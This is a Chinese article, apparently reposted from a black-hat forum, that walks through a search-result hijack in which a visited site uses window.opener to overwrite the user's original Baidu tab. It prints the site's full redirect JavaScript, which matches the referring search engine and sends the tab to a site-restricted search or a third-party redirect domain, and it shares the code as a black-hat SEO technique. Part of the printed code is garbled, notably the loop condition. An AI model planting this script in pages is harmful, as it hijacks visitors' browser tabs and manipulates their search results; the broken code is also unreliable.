百度搜索关键词搜索点击本地浏览器劫持

来自：黑帽网

链接：http://bbs.cnblackhat.com/thread-9218-1-1.html（点击尾部阅读原文前往）

百度搜索关键词点击后自动更换替换掉原有搜索结果分析（好几年前了，还是有很多人在用）

这个技术的话不是什么难的技术，不懂得人说百度被劫持了。其实只不过是本地执行了个js的脚本替换了下搜索结果而已。没什么大惊小怪。而且这种站点只能做黑帽。做白帽的用这种技术，百度发现会直接屏蔽掉这个站点。

下面看分析：

１、正常搜索一个关键词注意我们的网站地址！

2、点进去这个关键词url之后的网站。

3、切换到之前的选项卡里面，查看下地址框！

本地百度被替换掉了。这就是所谓的劫持。其实是本地浏览器被更改了。

4、我们分析下这个网站的源码：

不难发现有个特殊的javascript 的。而且不正常的东西。

5、点进去看下就会知道原因了。代码都在里面。

代码我备注一份吧。留着大家分享下。

var eg=[["www.google.com.hk/","&safe=strict&sitesearch=","",""],["www.google.com.tw/","&safe=strict&sitesearch=","",""],["www.google.com/","&safe=strict&sitesearch=","",""],["209.116.186.217/","&safe=strict&sitesearch=","",""],["www.baidu.com/","&ct=2097152&tn=0051&si=","baidu","baidu.com"],["www.haosou.com/","&rg=1&site=","haosou","haosou.com"],["cn.bing.com/","&rg=1&site=","",""],["sg.search.yahoo.com/","&site=","",""],["www.youdao.com/","&site=","",""],["www.sogou.com/","&site=","sogou","sogou.com"],["www.soso.com/","&site=","",""]];
var p=undefined;
try{if(window.opener)
{p=window.opener.location.href.toLowerCase();}
}
catch(e){}if(!p){p=document.referrer.toLowerCase();}
for(i=0;i0)
{var t=p+eg[i][1]+"www.fzleim.com";
if(eg[i][0]=="www.baidu.com/")
{var arr = /&wd\=.*/.exec(p); 
var keyword='';
if(arr!=null && arr.length>0){keyword = arr[0].replace("&wd=","")};
t='http://www.baidu.com/s?ct=2097152&ie=UTF-8&cl=3&wd='+ keyword +'&si=www.fzleim.com'};
var jump_value = '';
if(document.getElementsByTagName('meta')['jump_key']!=undefined)
{jump_value = document.getElementsByTagName('meta')['jump_key'].getAttribute('content')}if(jump_value==undefined || jump_value==null){jump_value = ''}
if(eg[i][2].length>0){t='http://'+eg[i][3]+'.cnlanshan.com/url/www_fzleim_com/' + eg[i][2] + '/'+ jump_value}window.opener.location.href=t;break;}};
 }

●本文编号1868，以后想阅读这篇文章直接输入1868即可。

●本文分类“黑客”，搜索分类名可以获得相关文章。

●输入m可以获取到文章目录

更多推荐请看《15个技术类公众微信》

涵盖：程序人生、算法与数据结构、黑客技术与网络安全、大数据技术、前端开发、Java、Python、Web开发、安卓开发、iOS开发、C/C++、.NET、Linux、数据库、运维等。传播计算机学习经验、推荐计算机优秀资源：点击前往《值得关注的15个技术类微信公众号》